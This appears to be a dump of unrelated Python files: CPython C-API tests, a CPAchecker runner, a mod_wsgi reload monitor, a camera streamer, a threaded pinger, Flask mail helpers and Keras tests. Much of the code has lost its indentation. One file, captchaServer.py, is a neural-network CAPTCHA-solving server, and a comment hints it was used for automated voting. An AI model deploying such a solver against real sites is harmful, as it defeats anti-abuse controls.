self.assertIn('Fatal Python error: test_fatal_error: MESSAGE\n',
err)
match = re.search(r'^Extension modules:(.*) \(total: ([0-9]+)\)$',
err, re.MULTILINE)
if not match:
self.fail(f"Cannot find 'Extension modules:' in {err!r}")
modules = set(match.group(1).strip().split(', '))
total = int(match.group(2))
for name in expected:
self.assertIn(name, modules)
for name in not_expected:
self.assertNotIn(name, modules)
self.assertEqual(len(modules), total)
@support.requires_subprocess()
def test_fatal_error(self):
# By default, stdlib extension modules are ignored,
# but not test modules.
expected = ('_testcapi',)
not_expected = ('sys',)
code = 'import _testcapi, sys; _testcapi.fatal_error(b"MESSAGE")'
self.check_fatal_error(code, expected, not_expected)
# Mark _testcapi as stdlib module, but not sys
expected = ('sys',)
not_expected = ('_testcapi',)
code = textwrap.dedent('''
import _testcapi, sys
sys.stdlib_module_names = frozenset({"_testcapi"})
_testcapi.fatal_error(b"MESSAGE")
''')
self.check_fatal_error(code, expected)
def test_pyobject_repr_from_null(self):
s = _testcapi.pyobject_repr_from_null()
self.assertEqual(s, '<NULL>')
def test_pyobject_str_from_null(self):
s = _testcapi.pyobject_str_from_null()
self.assertEqual(s, '<NULL>')
def test_pyobject_bytes_from_null(self):
s = _testcapi.pyobject_bytes_from_null()
self.assertEqual(s, b'<NULL>')
def test_Py_CompileString(self):
# Check that Py_CompileString respects the coding cookie
_compile = _testcapi.Py_CompileString
code = b"# -*- coding: latin1 -*-\nprint('\xc2\xa4')\n"
result = _compile(code)
expected = compile(code, "<string>", "exec")
self.assertEqual(result.co_consts, expected.co_consts)
def test_export_symbols(self):
# bpo-44133: Ensure that the "Py_FrozenMain" and
# "PyThread_get_thread_native_id" symbols are exported by the Python
# (directly by the binary, or via by the Python dynamic library).
ctypes = import_helper.import_module('ctypes')
names = []
# Test if the PY_HAVE_THREAD_NATIVE_ID macro is defined
if hasattr(_thread, 'get_native_id'):
names.append('PyThread_get_thread_native_id')
# Python/frozenmain.c fails to build on Windows when the symbols are
# missing:
# - PyWinFreeze_ExeInit
# - PyWinFreeze_ExeTerm
# - PyInitFrozenExtensions
if os.name != 'nt':
names.append('Py_FrozenMain')
for name in names:
with self.subTest(name=name):
self.assertTrue(hasattr(ctypes.pythonapi, name))
class TestPendingCalls(unittest.TestCase):
def pendingcalls_submit(self, l, n):
def callback():
#this function can be interrupted by thread switching so let's
#use an atomic operation
l.append(None)
for i in range(n):
time.sleep(random.random()*0.02) #0.01 secs on average
#try submitting callback until successful.
#rely on regular interrupt to flush queue if we are
#unsuccessful.
while True:
if _testcapi._pending_threadfunc(callback):
break
def pendingcalls_wait(self, l, n, context = None):
#now, stick around until l has grown to n entries
count = 0
while len(l) != n:
#this busy loop is where we expect to be interrupted to
#run our callbacks. Note that callbacks are only run on the
#main thread
if False and support.verbose:
print("(%i)"%(len(l),),)
for i in range(1000):
a = i*i
if context and not context.event.is_set():
continue
count += 1
self.assertTrue(count < 10000,
"timeout waiting for %i callbacks, got %i"%(n, len(l)))
if False and support.verbose:
print("(%i)"%(len(l),))
@threading_helper.requires_working_threading()
def test_pendingcalls_threaded(self):
#do every callback on a separate thread
n = 32 #total callbacks
threads = []
class foo(object):pass
context = foo()
context.l = []
context.n = 2 #submits per thread
context.nThreads = n // context.n
context.nFinished = 0
context.lock = threading.Lock()
context.event = threading.Event()
threads = [threading.Thread(target=self.pendingcalls_thread,
args=(context,))
for i in range(context.nThreads)]
with threading_helper.start_threads(threads):
self.pendingcalls_wait(context.l, n, context)
def pendingcalls_thread(self, context):
try:
self.pendingcalls_submit(context.l, context.n)
finally:
with context.lock:
context.nFinished += 1
nFinished = context.nFinished
if False and support.verbose:
print("finished threads: ", nFinished)
if nFinished == context.nThreads:
context.event.set()
def test_pendingcalls_non_threaded(self):
#again, just using the main thread, likely they will all be dispatched at
#once. It is ok to ask for too many, because we loop until we find a slot.
#the loop can be interrupted to dispatch.
#there are only 32 dispatch slots, so we go for twice that!
l = []
n = 64
self.pendingcalls_submit(l, n)
self.pendingcalls_wait(l, n)
class SubinterpreterTest(unittest.TestCase):
@unittest.skipUnless(hasattr(os, "pipe"), "requires os.pipe()")
def test_subinterps(self):
import builtins
r, w = os.pipe()
code = """if 1:
import sys, builtins, pickle
with open({:d}, "wb") as f:
pickle.dump(id(sys.modules), f)
pickle.dump(id(builtins), f)
""".format(w)
with open(r, "rb") as f:
ret = support.run_in_subinterp(code)
self.assertEqual(ret, 0)
self.assertNotEqual(pickle.load(f), id(sys.modules))
self.assertNotEqual(pickle.load(f), id(builtins))
@unittest.skipUnless(hasattr(os, "pipe"), "requires os.pipe()")
def test_subinterps_recent_language_features(self):
r, w = os.pipe()
code = """if 1:
import pickle
with open({:d}, "wb") as f:
@(lambda x:x) # Py 3.9
def noop(x): return x
a = (b := f'1{{2}}3') + noop('x') # Py 3.8 (:=) / 3.6 (f'')
async def foo(arg): return await arg # Py 3.5
pickle.dump(dict(a=a, b=b), f)
""".format(w)
with open(r, "rb") as f:
ret = support.run_in_subinterp(code)
self.assertEqual(ret, 0)
self.assertEqual(pickle.load(f), {'a': '123x', 'b': '123'})
def test_mutate_exception(self):
"""
Exceptions saved in global module state get shared between
individual module instances. This test checks whether or not
a change in one interpreter's module gets reflected into the
other ones.
"""
import binascii
support.run_in_subinterp("import binascii; binascii.Error.foobar = 'foobar'")
self.assertFalse(hasattr(binascii.Error, "foobar"))
@unittest.skipIf(_testmultiphase is None, "test requires _testmultiphase module")
def test_module_state_shared_in_global(self):
"""
bpo-44050: Extension module state should be shared between interpreters
when it doesn't support sub-interpreters.
"""
r, w = os.pipe()
self.addCleanup(os.close, r)
self.addCleanup(os.close, w)
script = textwrap.dedent(f"""
import importlib.machinery
import importlib.util
import os
fullname = '_test_module_state_shared'
origin = importlib.util.find_spec('_testmultiphase').origin
loader = importlib.machinery.ExtensionFileLoader(fullname, origin)
spec = importlib.util.spec_from_loader(fullname, loader)
module = importlib.util.module_from_spec(spec)
attr_id = str(id(module.Error)).encode()
os.write({w}, attr_id)
""")
exec(script)
main_attr_id = os.read(r, 100)
ret = support.run_in_subinterp(script)
self.assertEqual(ret, 0)
subinterp_attr_id = os.read(r, 100)
self.assertEqual(main_attr_id, subinterp_attr_id)
class TestThreadState(unittest.TestCase):
@threading_helper.reap_threads
@threading_helper.requires_working_threading()
def test_thread_state(self):
# some extra thread-state tests driven via _testcapi
def target():
idents = []
def callback():
idents.append(threading.get_ident())
_testcapi._test_thread_state(callback)
a = b = callback
time.sleep(1)
# Check our main thread is in the list exactly 3 times.
self.assertEqual(idents.count(threading.get_ident()), 3,
"Couldn't find main thread correctly in the list")
target()
t = threading.Thread(target=target)
t.start()
t.join()
class Test_testcapi(unittest.TestCase):
locals().update((name, getattr(_testcapi, name))
for name in dir(_testcapi)
if name.startswith('test_') and not name.endswith('_code'))
# Suppress warning from PyUnicode_FromUnicode().
@warnings_helper.ignore_warnings(category=DeprecationWarning)
def test_widechar(self):
_testcapi.test_widechar()
def test_version_api_data(self):
self.assertEqual(_testcapi.Py_Version, sys.hexversion)
class Test_testinternalcapi(unittest.TestCase):
locals().update((name, getattr(_testinternalcapi, name))
for name in dir(_testinternalcapi)
if name.startswith('test_'))
@support.requires_subprocess()
class PyMemDebugTests(unittest.TestCase):
PYTHONMALLOC = 'debug'
# '0x04c06e0' or '04C06E0'
PTR_REGEX = r'(?:0x)?[0-9a-fA-F]+'
def check(self, code):
with support.SuppressCrashReport():
out = assert_python_failure(
'-c', code,
PYTHONMALLOC=self.PYTHONMALLOC,
# FreeBSD: instruct jemalloc to not fill freed() memory
# with junk byte 0x5a, see JEMALLOC(3)
MALLOC_CONF="junk:false",
)
stderr = out.err
return stderr.decode('ascii', 'replace')
def test_buffer_overflow(self):
out = self.check('import _testcapi; _testcapi.pymem_buffer_overflow()')
regex = (r"Debug memory block at address p={ptr}: API 'm'\n"
r" 16 bytes originally requested\n"
r" The [0-9] pad bytes at p-[0-9] are FORBIDDENBYTE, as expected.\n"
r" The [0-9] pad bytes at tail={ptr} are not all FORBIDDENBYTE \(0x[0-9a-f]{{2}}\):\n"
r" at tail\+0: 0x78 \*\*\* OUCH\n"
r" at tail\+1: 0xfd\n"
r" at tail\+2: 0xfd\n"
r" .*\n"
r"( The block was made by call #[0-9]+ to debug malloc/realloc.\n)?"
r" Data at p: cd cd cd .*\n"
r"\n"
r"Enable tracemalloc to get the memory block allocation traceback\n"
r"\n"
r"Fatal Python error: _PyMem_DebugRawFree: bad trailing pad byte")
regex = regex.format(ptr=self.PTR_REGEX)
regex = re.compile(regex, flags=re.DOTALL)
self.assertRegex(out, regex)
def test_api_misuse(self):
out = self.check('import _testcapi; _testcapi.pymem_api_misuse()')
regex = (r"Debug memory block at address p={ptr}: API 'm'\n"
r" 16 bytes originally requested\n"
r" The [0-9] pad bytes at p-[0-9] are FORBIDDENBYTE, as expected.\n"
r" The [0-9] pad bytes at tail={ptr} are FORBIDDENBYTE, as expected.\n"
r"( The block was made by call #[0-9]+ to debug malloc/realloc.\n)?"
r" Data at p: cd cd cd .*\n"
r"\n"
r"Enable tracemalloc to get the memory block allocation traceback\n"
r"\n"
r"Fatal Python error: _PyMem_DebugRawFree: bad ID: Allocated using API 'm', verified using API 'r'\n")
regex = regex.format(ptr=self.PTR_REGEX)
self.assertRegex(out, regex)
def check_malloc_without_gil(self, code):
out = self.check(code)
expected = ('Fatal Python error: _PyMem_DebugMalloc: '
'Python memory allocator called without holding the GIL')
self.assertIn(expected, out)
def test_pymem_malloc_without_gil(self):
# Debug hooks must raise an error if PyMem_Malloc() is called
# without holding the GIL
code = 'import _testcapi; _testcapi.pymem_malloc_without_gil()'
self.check_malloc_without_gil(code)
def test_pyobject_malloc_without_gil(self):
# Debug hooks must raise an error if PyObject_Malloc() is called
# without holding the GIL
code = 'import _testcapi; _testcapi.pyobject_malloc_without_gil()'
self.check_malloc_without_gil(code)
def check_pyobject_is_freed(self, func_name):
code = textwrap.dedent(f'''
import gc, os, sys, _testcapi
# Disable the GC to avoid crash on GC collection
gc.disable()
try:
_testcapi.{func_name}()
# Exit immediately to avoid a crash while deallocating
# the invalid object
os._exit(0)
except _testcapi.error:
os._exit(1)
''')
assert_python_ok(
'-c', code,
PYTHONMALLOC=self.PYTHONMALLOC,
MALLOC_CONF="junk:false",
)
def test_pyobject_null_is_freed(self):
self.check_pyobject_is_freed('check_pyobject_null_is_freed')
def test_pyobject_uninitialized_is_freed(self):
self.check_pyobject_is_freed('check_pyobject_uninitialized_is_freed')
def test_pyobject_forbidden_bytes_is_freed(self):
self.check_pyobject_is_freed('check_pyobject_forbidden_bytes_is_freed')
def test_pyobject_freed_is_freed(self):
self.check_pyobject_is_freed('check_pyobject_freed_is_freed')
class PyMemMallocDebugTests(PyMemDebugTests):
PYTHONMALLOC = 'malloc_debug'
@unittest.skipUnless(support.with_pymalloc(), 'need pymalloc')
class PyMemPymallocDebugTests(PyMemDebugTests):
PYTHONMALLOC = 'pymalloc_debug'
@unittest.skipUnless(Py_DEBUG, 'need Py_DEBUG')
class PyMemDefaultTests(PyMemDebugTests):
# test default allocator of Python compiled in debug mode
PYTHONMALLOC = ''
@unittest.skipIf(_testmultiphase is None, "test requires _testmultiphase module")
class Test_ModuleStateAccess(unittest.TestCase):
"""Test access to module start (PEP 573)"""
# The C part of the tests lives in _testmultiphase, in a module called
# _testmultiphase_meth_state_access.
# This module has multi-phase initialization, unlike _testcapi.
def setUp(self):
fullname = '_testmultiphase_meth_state_access' # XXX
origin = importlib.util.find_spec('_testmultiphase').origin
loader = importlib.machinery.ExtensionFileLoader(fullname, origin)
spec = importlib.util.spec_from_loader(fullname, loader)
module = importlib.util.module_from_spec(spec)
loader.exec_module(module)
self.module = module
def test_subclass_get_module(self):
"""PyType_GetModule for defining_class"""
class StateAccessType_Subclass(self.module.StateAccessType):
pass
instance = StateAccessType_Subclass()
self.assertIs(instance.get_defining_module(), self.module)
def test_subclass_get_module_with_super(self):
class StateAccessType_Subclass(self.module.StateAccessType):
def get_defining_module(self):
return super().get_defining_module()
instance = StateAccessType_Subclass()
self.assertIs(instance.get_defining_module(), self.module)
def test_state_access(self):
"""Checks methods defined with and without argument clinic
This tests a no-arg method (get_count) and a method with
both a positional and keyword argument.
"""
a = self.module.StateAccessType()
b = self.module.StateAccessType()
methods = {
'clinic': a.increment_count_clinic,
'noclinic': a.increment_count_noclinic,
}
for name, increment_count in methods.items():
with self.subTest(name):
self.assertEqual(a.get_count(), b.get_count())
self.assertEqual(a.get_count(), 0)
increment_count()
self.assertEqual(a.get_count(), b.get_count())
self.assertEqual(a.get_count(), 1)
increment_count(3)
self.assertEqual(a.get_count(), b.get_count())
self.assertEqual(a.get_count(), 4)
increment_count(-2, twice=True)
self.assertEqual(a.get_count(), b.get_count())
self.assertEqual(a.get_count(), 0)
with self.assertRaises(TypeError):
increment_count(thrice=3)
with self.assertRaises(TypeError):
increment_count(1, 2, 3)
def test_get_module_bad_def(self):
# PyType_GetModuleByDef fails gracefully if it doesn't
# find what it's looking for.
# see bpo-46433
instance = self.module.StateAccessType()
with self.assertRaises(TypeError):
instance.getmodulebydef_bad_def()
def test_get_module_static_in_mro(self):
# Here, the class PyType_GetModuleByDef is looking for
# appears in the MRO after a static type (Exception).
# see bpo-46433
class Subclass(BaseException, self.module.StateAccessType):
pass
self.assertIs(Subclass().get_defining_module(), self.module)
class Test_FrameAPI(unittest.TestCase):
def getframe(self):
return sys._getframe()
def getgenframe(self):
yield sys._getframe()
def test_frame_getters(self):
frame = self.getframe()
self.assertEqual(frame.f_locals, _testcapi.frame_getlocals(frame))
self.assertIs(frame.f_globals, _testcapi.frame_getglobals(frame))
self.assertIs(frame.f_builtins, _testcapi.frame_getbuiltins(frame))
self.assertEqual(frame.f_lasti, _testcapi.frame_getlasti(frame))
def test_frame_get_generator(self):
gen = self.getgenframe()
frame = next(gen)
self.assertIs(gen, _testcapi.frame_getgenerator(frame))
SUFFICIENT_TO_DEOPT_AND_SPECIALIZE = 100
class Test_Pep523API(unittest.TestCase):
def do_test(self, func):
calls = []
start = SUFFICIENT_TO_DEOPT_AND_SPECIALIZE
count = start + SUFFICIENT_TO_DEOPT_AND_SPECIALIZE
for i in range(count):
if i == start:
_testinternalcapi.set_eval_frame_record(calls)
func()
_testinternalcapi.set_eval_frame_default()
self.assertEqual(len(calls), SUFFICIENT_TO_DEOPT_AND_SPECIALIZE)
for name in calls:
self.assertEqual(name, func.__name__)
def test_pep523_with_specialization_simple(self):
def func1():
pass
self.do_test(func1)
def test_pep523_with_specialization_with_default(self):
def func2(x=None):
pass
self.do_test(func2)
if __name__ == "__main__":
unittest.main()
|
checker.py
|
# MIT License
#
# Copyright (c) 2018-2019 Yuxin (Ryan) Wang
#
# Permission is hereby granted, free of charge, to any person obtaining a copy
# of this software and associated documentation files (the "Software"), to deal
# in the Software without restriction, including without limitation the rights
# to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
# copies of the Software, and to permit persons to whom the Software is
# furnished to do so, subject to the following conditions:
#
# The above copyright notice and this permission notice shall be included in all
# copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
# AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
# SOFTWARE.
from collections import OrderedDict
from queue import Queue
import os
import subprocess
import threading
import logging
import shutil
import re
logger = logging.getLogger(__name__)
def _thread_wait_for(results, name, process):
try:
# wait for 30 seconds
out, err = process.communicate(timeout=30)
if r'Verification result: TRUE' in str(out):
results.put((True, name, None, None))
else:
results.put((False, name, out, err))
except subprocess.TimeoutExpired:
results.put((False, '30 seconds Timeout', '', ''))
def check(checkerpath, path, args=None):
funcname = os.path.splitext(os.path.basename(path))[0]
args = args.split(' ') if args else []
logger.info('Start checking {} with multiple solvers (MathSat, Z3, SMTInterpol)...'.format(path))
processes = OrderedDict()
processes['MathSat'] = subprocess.Popen(
[checkerpath + '/scripts/cpa.sh', '-predicateAnalysis', path, '-preprocess',
'-setprop', 'cpa.predicate.encodeFloatAs=RATIONAL', '-setprop', 'cpa.predicate.encodeBitvectorAs=INTEGER',
'-setprop', 'solver.nonLinearArithmetic=USE', '-setprop', 'output.path=output-{}-MathSat'.format(funcname),
'-setprop', 'solver.solver=MATHSAT5',
*args],
stdout=subprocess.PIPE,
stderr=subprocess.PIPE
)
processes['Z3'] = subprocess.Popen(
[checkerpath + '/scripts/cpa.sh', '-predicateAnalysis', path, '-preprocess',
'-setprop', 'cpa.predicate.encodeFloatAs=RATIONAL', '-setprop', 'cpa.predicate.encodeBitvectorAs=INTEGER',
'-setprop', 'solver.nonLinearArithmetic=USE', '-setprop', 'output.path=output-{}-Z3'.format(funcname),
'-setprop', 'solver.solver=Z3',
*args],
stdout=subprocess.PIPE,
stderr=subprocess.PIPE
)
processes['SMTInterpol'] = subprocess.Popen(
[checkerpath + '/scripts/cpa.sh', '-predicateAnalysis-linear', path, '-preprocess',
'-setprop', 'solver.solver=smtinterpol', '-setprop', 'output.path=output-{}-SMTInterpol'.format(funcname)],
stdout=subprocess.PIPE,
stderr=subprocess.PIPE
)
# start threads to wait for results
results = Queue()
threads = set()
for name, proc in processes.items():
thread = threading.Thread(target=_thread_wait_for, args=(results, name, proc))
threads.add(thread)
thread.start()
# get the results
errors = set()
is_verified = False
verified_solver = ''
for _ in range(len(processes)):
verified, name, out, err = results.get()
if verified:
logger.info('{} verified with {}.'.format(path, name))
# open and read report to find
with open('./output-{}-{}/Statistics.txt'.format(funcname, name)) as report:
all_report = report.read()
time = re.search(r'Total time for CPAchecker[:\s<>/a-zA-Z]*([0-9]+\.[0-9]+s)', all_report).groups()
logger.info('Verification finished in {}'.format(time[0]))
logger.info('CPA-Checker reports can be found at ./output-{}-{}'.format(funcname, name))
verified_solver = name
is_verified = True
break
else:
# log the error if this solver fails
errors.add((name, out, err))
# clean up threads and processes
for proc in processes.values():
proc.kill()
proc.wait()
for thread in threads:
thread.join()
    # remove output of solvers that did not verify the program (the directory
    # may be missing if a solver failed before producing output)
    for solver in ('MathSat', 'Z3', 'SMTInterpol'):
        if solver != verified_solver:
            shutil.rmtree('./output-{}-{}'.format(funcname, solver), ignore_errors=True)
# if no solvers can verify the program
if not is_verified:
logger.warning('No solvers can verify the program, error messages shown below:')
for name, out, err in errors:
logger.warning('{}:\n\tout: {}\n\terr:{}'.format(name, out.decode('ascii'), err.decode('ascii')))
return is_verified
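# --- Usage sketch (not part of the original module) ---
# A minimal, hypothetical invocation of check(); the CPAchecker install path
# and the C source file below are placeholders, not values from this project.
if __name__ == '__main__':
    logging.basicConfig(level=logging.INFO)
    if check('/opt/cpachecker', 'examples/absolute_value.c'):
        logger.info('Program verified.')
    else:
        logger.warning('Program could not be verified.')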
|
wsgi_restart.py
|
# This code lifted from the mod_wsgi docs.
from __future__ import print_function
import os
import sys
import signal
import threading
import atexit
import Queue
_interval = 1.0
_times = {}
_files = []
_running = False
_queue = Queue.Queue()
_lock = threading.Lock()
def _restart(path):
_queue.put(True)
prefix = 'monitor (pid=%d):' % os.getpid()
print('%s Change detected to \'%s\'.' % (prefix, path), file=sys.stderr)
print('%s Triggering process restart.' % prefix, file=sys.stderr)
os.kill(os.getpid(), signal.SIGINT)
def _modified(path):
try:
        # If path doesn't denote a file and we were previously
        # tracking it, then it has been removed or the file type has
        # changed, so force a restart. If we were not previously
        # tracking the file then we can ignore it, as it is probably a
        # pseudo reference such as a file extracted from a collection
        # of modules contained in a zip file.
if not os.path.isfile(path):
return path in _times
# Check for when file last modified.
mtime = os.stat(path).st_mtime
if path not in _times:
_times[path] = mtime
# Force restart when modification time has changed, even
# if time now older, as that could indicate older file
# has been restored.
if mtime != _times[path]:
return True
    except Exception:
        # If any exception occurred, it is likely that the file has
        # been removed just before stat(), so force a restart.
return True
return False
def _monitor():
while True:
# Check modification times on all files in sys.modules.
for module in sys.modules.values():
if not hasattr(module, '__file__'):
continue
path = getattr(module, '__file__')
if not path:
continue
if os.path.splitext(path)[1] in ['.pyc', '.pyo', '.pyd']:
path = path[:-1]
if _modified(path):
return _restart(path)
# Check modification times on files which have
# specifically been registered for monitoring.
for path in _files:
if _modified(path):
return _restart(path)
# Go to sleep for specified interval.
try:
return _queue.get(timeout=_interval)
except Exception:
pass
_thread = threading.Thread(target=_monitor)
_thread.setDaemon(True)
def _exiting():
try:
_queue.put(True)
except Exception:
pass
_thread.join()
atexit.register(_exiting)
def track(path):
if path not in _files:
_files.append(path)
def start(interval=1.0):
global _interval
if interval < _interval:
_interval = interval
global _running
    _lock.acquire()
    if not _running:
        prefix = 'monitor (pid=%d):' % os.getpid()
        print('%s Starting change monitor.' % prefix, file=sys.stderr)
        _running = True
        _thread.start()
    _lock.release()
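# --- Usage sketch (not part of the original module) ---
# In a mod_wsgi application script this module is normally imported and
# start()/track() are called once; run directly, this demo simply watches its
# own source file until a change triggers a restart.
if __name__ == '__main__':
    import time
    start(interval=1.0)
    track(os.path.abspath(__file__))
    while True:
        time.sleep(5)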
|
CameraController.py
|
import sys
import threading
import logging
import os
import io
import datetime
import time
import socket
import Controller
class CameraController(Controller.Controller):
TAG_EZ_IMAGE = bytearray(b"EZIMG")
def __init__(self, name, server, resolution, framerate, log_level):
self.name = name
self.server = server
self.resolution = resolution
self.framerate = framerate
self.log_level = log_level
self.logger = logging.getLogger(name)
self.logger.setLevel(log_level)
self.shutdown = False
self.run_thread = None
def setup(self):
return True
def start(self):
if not self.setup():
self.shutdown = True
return
self.shutdown = False
self.run_thread = threading.Thread(target=self.run, args=())
self.run_thread.start()
def stop(self):
if self.shutdown:
self.logger.warning("Already stopped")
return
self.logger.debug("stopping")
self.shutdown = True
if self.run_thread is not None:
self.logger.debug("join th:%s", self.run_thread.getName())
self.run_thread.join()
def run(self):
self.logger.debug("running thread:%s", threading.current_thread().getName())
try:
self.main()
except Exception as ex:
self.shutdown = True
self.logger.debug("exception %s", ex)
try:
self.run_end()
except Exception as ex:
self.logger.debug("end exception %s", ex)
self.logger.debug("terminated")
def run_end(self):
pass
    def main(self):
        # Default implementation: send empty frames at the configured frame
        # rate. Subclasses are expected to override this with real image data.
        frame_rate_delay = 1 / self.framerate
        while not self.shutdown:
            data = bytearray()
            data += self.TAG_EZ_IMAGE
            img_len = 0
            data += img_len.to_bytes(4, "little")
            self.server.send_image(bytes(data))
            time.sleep(frame_rate_delay)
def send_image(self, img_bytes):
data = bytearray()
data += self.TAG_EZ_IMAGE
img_len = len(img_bytes)
data += img_len.to_bytes(4, "little")
data += img_bytes
self.server.send_image(bytes(data))
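# --- Usage sketch (not part of the original module) ---
# A hypothetical subclass that streams a fixed byte payload. FakeServer and the
# payload are placeholders used only to illustrate the API, and the sketch
# still assumes the local Controller module is importable.
if __name__ == '__main__':
    class FakeServer:
        def send_image(self, data):
            print("sending %d bytes" % len(data))

    class StaticCamera(CameraController):
        def main(self):
            while not self.shutdown:
                self.send_image(b"\x00" * 16)
                time.sleep(1 / self.framerate)

    cam = StaticCamera("demo", FakeServer(), (640, 480), 2, logging.DEBUG)
    cam.start()
    time.sleep(2)
    cam.stop()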
|
captchaServer.py
|
#coding:utf-8
portList = (8889,)  # ports this server listens on
import tornado.ioloop
import tornado.web
import numpy as np
from time import sleep
#import shutil
#import os
from random import random
from io import BytesIO
from PIL import Image
from base64 import b64decode
import utils
model = utils.loadmodel('Model.json', 'Weights.h5')
REFSTR = '0123456789ABCDEFGHIJKLMNOPQRSTUVWXYZ'
def decaptcha(img):
try:
        #upload_path=os.path.join(os.path.dirname(__file__),'files') # temporary storage path for uploaded files
        #file_metas=self.request.files['file'] # extract metadata of the form field named 'file'
#print(file_metas)
#print(self)
#img0 = b64decode(self.get_argument('file'))
#img = Image.open(BytesIO(img0))
img = Image.open(BytesIO(img))
        img = 255 - np.array(img.convert('L'))  # convert to grayscale and invert
cnt,img = utils.splitimage(img)
        img = np.expand_dims(img, axis=-1)  # at this point img is still image data
img = model.predict(img)
img = np.argmax(img, axis=-1)
img = ''.join(REFSTR[ch] for ch in img)
## for meta in file_metas:
## filename=meta['filename']
## filepath=os.path.join(upload_path,filename)
##            with open(filepath,'wb') as up: # some files need to be stored in binary form; change as needed in practice
## up.write(meta['body'])
        if random() < 0.8568:
img = img.lower()
#self.write(img)
#print(img)
## try:
## with open('%s.txt'%('未执行投票'+img),'wb') as imgSave:
## #imgSave.write(img0)
## pass
## except Exception:
## print ('存验证码出错 可能硬盘过载!')
return img
    except Exception as e:
        print(e)
        return '!'
class MainHandler(tornado.web.RequestHandler):
## def get(self):
##        # Allow direct browser access to upload and recognize an image manually. This feature is only for testing and fun
## self.write('''
##<html>
## <head><title>Upload File</title></head>
## <body>
## <form action='file' enctype="multipart/form-data" method='post'>
## <input type='file' name='file'/><br/>
## <input type='submit' value='submit'/>
## </form>
## </body>
##</html>
##''')
def get(self):
self.write('Captcha server is ready!')
async def post(self):
#img = b64decode(self.get_argument('file'))
img=self.request.body
self.write(decaptcha(img))
def run_proc(port):
app=tornado.web.Application([
(r'/',MainHandler),
])
app.listen(port)
print('CaptchaServer@localhost:%d'%(port))
tornado.ioloop.IOLoop.instance().start()
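# --- Client sketch (not part of the original server) ---
# The POST handler reads the raw request body as image bytes, so a client can
# send a captcha image directly. The URL, file name, and use of the `requests`
# library below are illustrative assumptions, not part of this project.
def _example_client(path='captcha.png', url='http://localhost:8889/'):
    import requests
    with open(path, 'rb') as f:
        return requests.post(url, data=f.read()).text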
if __name__ == '__main__':
from multiprocessing import Process
    length = len(portList)
    # Spawn a worker process for every port except the last, which runs in this process.
    for i in range(length - 1):
        p = Process(target=run_proc, args=(portList[i],))
        p.start()
    run_proc(portList[length - 1])
|
pinger_thread.py
|
import os
import threading
from timeit import default_timer as timer
def pinger():
    # Run ping and print its captured output (note: without a packet-count
    # flag, ping may run until the command itself terminates).
    output = os.popen('ping www.bbc.co.uk')
    print(list(output))
threads = []
for _ in range(4):
t = threading.Thread(target=pinger)
threads.append(t)
start = timer()
for thread in threads:
thread.start()
for thread in threads:
thread.join()
end = timer()
print('\nthreads time', end - start)
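# --- Alternative sketch (not part of the original script) ---
# The same I/O-bound fan-out can be written with concurrent.futures instead of
# managing Thread objects by hand; this variant is illustrative and is not
# invoked or timed above.
from concurrent.futures import ThreadPoolExecutor

def ping_with_pool(workers=4):
    with ThreadPoolExecutor(max_workers=workers) as pool:
        for _ in range(workers):
            pool.submit(pinger)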
|
emails.py
|
from threading import Thread
from flask import current_app, render_template
from flask_mail import Message
from wenmo.extensions import mail
def _send_async_mail(app, message):
with app.app_context():
mail.send(message)
def send_mail(to, subject, template, **kwargs):
message = Message(current_app.config['WENMO_MAIL_SUBJECT_PREFIX'] + subject, recipients=[to])
message.body = render_template(template + '.txt', **kwargs)
message.html = render_template(template + '.html', **kwargs)
app = current_app._get_current_object()
thr = Thread(target=_send_async_mail, args=[app, message])
thr.start()
return thr
def send_confirm_email(user, token, to=None):
send_mail(subject='Email Confirm', to=to or user.email, template='emails/confirm', user=user, token=token)
def send_reset_password_email(user, token):
send_mail(subject='Password Reset', to=user.email, template='emails/reset_password', user=user, token=token)
def send_change_email_email(user, token, to=None):
send_mail(subject='Change Email Confirm', to=to or user.email, template='emails/change_email', user=user, token=token)
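# --- Usage sketch (not part of the original module) ---
# send_mail() returns the background thread, so a caller that must wait for
# delivery (for example a test) can join it; the address below is a
# placeholder, and an application context is still required.
def _example_send(user, token):
    thr = send_mail(to='user@example.com', subject='Email Confirm',
                    template='emails/confirm', user=user, token=token)
    thr.join()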
|
callbacks_test.py
|
# Copyright 2016 The TensorFlow Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
"""Tests for Keras callbacks."""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import csv
import os
import re
import shutil
import tempfile
import threading
import unittest
import numpy as np
from tensorflow.core.framework import summary_pb2
from tensorflow.python import keras
from tensorflow.python.framework import random_seed
from tensorflow.python.framework import test_util
from tensorflow.python.keras import testing_utils
from tensorflow.python.platform import test
from tensorflow.python.platform import tf_logging as logging
from tensorflow.python.summary.writer import writer_cache
from tensorflow.python.training import adam
try:
import h5py # pylint:disable=g-import-not-at-top
except ImportError:
h5py = None
try:
import requests # pylint:disable=g-import-not-at-top
except ImportError:
requests = None
TRAIN_SAMPLES = 10
TEST_SAMPLES = 10
NUM_CLASSES = 2
INPUT_DIM = 3
NUM_HIDDEN = 5
BATCH_SIZE = 5
class KerasCallbacksTest(test.TestCase):
def test_ModelCheckpoint(self):
if h5py is None:
return # Skip test if models cannot be saved.
with self.test_session():
np.random.seed(1337)
temp_dir = self.get_temp_dir()
self.addCleanup(shutil.rmtree, temp_dir, ignore_errors=True)
filepath = os.path.join(temp_dir, 'checkpoint.h5')
(x_train, y_train), (x_test, y_test) = testing_utils.get_test_data(
train_samples=TRAIN_SAMPLES,
test_samples=TEST_SAMPLES,
input_shape=(INPUT_DIM,),
num_classes=NUM_CLASSES)
